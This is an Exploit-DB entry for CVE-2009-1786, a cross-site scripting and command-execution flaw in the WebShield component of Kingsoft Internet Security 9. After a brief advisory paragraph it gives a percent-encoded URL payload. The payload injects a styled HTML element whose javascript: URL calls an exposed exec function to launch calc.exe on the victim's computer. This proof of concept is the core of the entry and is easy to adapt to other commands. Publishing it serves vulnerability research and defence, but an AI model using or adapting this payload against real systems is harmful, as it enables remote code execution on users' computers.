- 18 Dec 2022
- EDB-ID
- 33001
- EDB Verified
- Passed
- Author
- INKING
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2009-1786
- Publication date
- 2009-05-20
Code:
source: https://www.securityfocus.com/bid/35038/info
The WebShield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.
Remote attackers may exploit this vulnerability to compromise an affected computer.
This issue affects WebShield 1.1.0.62 and prior versions.
http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
- Source
- www.exploit-db.com